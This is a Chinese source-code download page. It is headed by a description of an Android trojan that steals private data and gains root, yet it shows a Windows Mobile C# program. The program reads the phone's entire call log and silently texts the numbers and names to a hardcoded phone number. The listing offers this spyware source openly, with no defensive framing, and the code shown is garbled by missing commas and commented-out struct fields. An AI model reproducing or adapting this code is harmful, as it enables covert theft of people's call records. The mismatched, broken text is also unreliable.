资源简介
一批新型Android木马 “安卓卧底”又出现在用户手机之中 该类木马在窃取用户隐私的同时 竟可以利用系统溢出漏洞获取ROOT权限 系统最高的管理员权限 使黑客可以通过云端指令控制用户手机 实现包括删除系统文件 程序 甚至窃取几乎所有文件的操作 ">一批新型Android木马 “安卓卧底”又出现在用户手机之中 该类木马在窃取用户隐私的同时 竟可以利用系统溢出漏洞获取ROOT权限 系统最高的管理员权限 使黑客可以通过云端指令控制用户手机 实现包括删除系统文件 程 [更多]
代码片段和文件信息
using System;
using System.Collections.Generic;
using System.Text;
using System.Runtime.InteropServices;
using Microsoft.WindowsMobile.PocketOutlook;
namespace ReturnCall
{
class Program
{
[StructLayout(LayoutKind.Sequential)]
public struct CALLLOGENTRY
{
/*
public UInt32 cbSize;
public UInt64 ftStartTime;
public UInt64 ftEndTime;
public short iom;
public bool fOutgoing;
public bool fConnected;
public bool fEnded;
public bool fRoam;
public short cidt;
public IntPtr pszNumber;
public IntPtr pszName;
public IntPtr pszNameType;
public IntPtr pszNote;
*/
};
[DllImport(“phone.dll“ EntryPoint = “PhoneOpenCallLog“ SetLastError = true)]
private static extern int PhoneOpenCallLog(ref IntPtr pHandle);
[DllImport(“phone.dll“ EntryPoint = “PhoneCloseCallLog“ SetLastError = true)]
private static extern int PhoneCloseCallLog(IntPtr pHandle);
[DllImport(“phone.dll“ EntryPoint = “PhoneGetCallLogEntry“ SetLastError = true)]
private static extern int PhoneGetCallLogEntry(IntPtr pHandke ref CALLLOGENTRY pEntry);
static void Main(string[] args)
{
{
string CallInfo = ““;
try
{
IntPtr handle = IntPtr.Zero;
CALLLOGENTRY entry = new CALLLOGENTRY();
PhoneOpenCallLog(ref handle);
entry.cbSize = (uint)Marshal.SizeOf(entry);
if (handle != IntPtr.Zero)
{
while (PhoneGetCallLogEntry(handle ref entry) == 0)
{
string phoneNumber = Marshal.PtrToStringUni(entry.pszNumber);
string name = Marshal.PtrToStringUni(entry.pszName);
if (phoneNumber == null)
{
phoneNumber = string.Empty;
}
if (name == null)
{
name = string.Empty;
}
string temp = (phoneNumber.Trim() + name.Trim());
CallInfo = CallInfo + temp;
}
PhoneCloseCallLog(handle);
Microsoft.WindowsMobile.PocketOutlook.SmsMessage sms = new SmsMessage(“151608XXXXXX“ CallInfo.Substring(0 140));
sms.Send();
}
else
{
int error = Marshal.GetLastWin32Error();
}
}
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
文件 30 2009-01-23 16:06 代码\readme.txt
文件 5880 2005-04-22 23:09 代码\获取通话记录\ReturnCall\bin\Debug\Microsoft.WindowsMobile.dll
文件 156920 2005-04-22 23:09 代码\获取通话记录\ReturnCall\bin\Debug\Microsoft.WindowsMobile.PocketOutlook.dll
文件 304810 2005-04-22 20:35 代码\获取通话记录\ReturnCall\bin\Debug\Microsoft.WindowsMobile.PocketOutlook.xm
文件 4482 2005-04-22 20:35 代码\获取通话记录\ReturnCall\bin\Debug\Microsoft.WindowsMobile.xm
文件 4608 2009-01-23 15:46 代码\获取通话记录\ReturnCall\bin\Debug\ReturnCall.exe
文件 11776 2009-01-23 15:46 代码\获取通话记录\ReturnCall\bin\Debug\ReturnCall.pdb
文件 12642 2009-01-23 18:24 代码\获取通话记录\ReturnCall\obj\Debug\ResolveAssemblyReference.cache
文件 4608 2009-01-23 15:46 代码\获取通话记录\ReturnCall\obj\Debug\ReturnCall.exe
文件 330 2009-01-23 18:26 代码\获取通话记录\ReturnCall\obj\ReturnCall.csproj.FileList.txt
文件 3171 2009-02-03 17:23 代码\获取通话记录\ReturnCall\Program.cs
文件 1151 2009-01-22 15:14 代码\获取通话记录\ReturnCall\Properties\AssemblyInfo.cs
文件 3488 2009-01-23 15:45 代码\获取通话记录\ReturnCall\ReturnCall.csproj
文件 198 2009-01-22 15:14 代码\获取通话记录\ReturnCall\ReturnCall.csproj.user
文件 1085 2009-01-22 15:14 代码\获取通话记录\ReturnCall.sln
..A..H. 14336 2009-02-03 17:23 代码\获取通话记录\ReturnCall.suo
目录 0 2009-01-23 16:03 代码\获取通话记录\ReturnCall\obj\Debug\TempPE
目录 0 2009-01-23 16:03 代码\获取通话记录\ReturnCall\bin\Debug
目录 0 2009-01-23 18:24 代码\获取通话记录\ReturnCall\obj\Debug
目录 0 2009-01-23 16:03 代码\获取通话记录\ReturnCall\bin
目录 0 2009-01-23 16:03 代码\获取通话记录\ReturnCall\obj
目录 0 2009-01-23 16:03 代码\获取通话记录\ReturnCall\Properties
目录 0 2009-02-03 17:23 代码\获取通话记录\ReturnCall
目录 0 2009-01-23 16:03 代码\获取通话记录
目录 0 2009-02-03 17:22 代码
----------- --------- ---------- ----- ----
529515 25
- 上一篇:jsp程序设计课后习题答案227159
- 下一篇:java小游戏jar
评论
共有 条评论